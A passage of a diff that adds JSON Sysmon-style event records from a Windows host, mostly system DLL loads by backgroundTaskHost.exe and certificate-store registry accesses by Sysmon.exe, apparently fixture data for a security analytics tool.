+ "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 
2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689330000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 
2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "WinTypes.dll", + "image_path": "C:\\Windows\\System32\\WinTypes.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689180000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571689650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "MrmCoreR.dll", + "image_path": "C:\\Windows\\System32\\MrmCoreR.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689650000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689800000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", 
+ "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust 
Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571690270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571690270000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571690580000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571690580000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "policymanager.dll", + "image_path": "C:\\Windows\\System32\\policymanager.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571690580000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "wldp.dll", + "image_path": "C:\\Windows\\System32\\wldp.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + 
}, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", 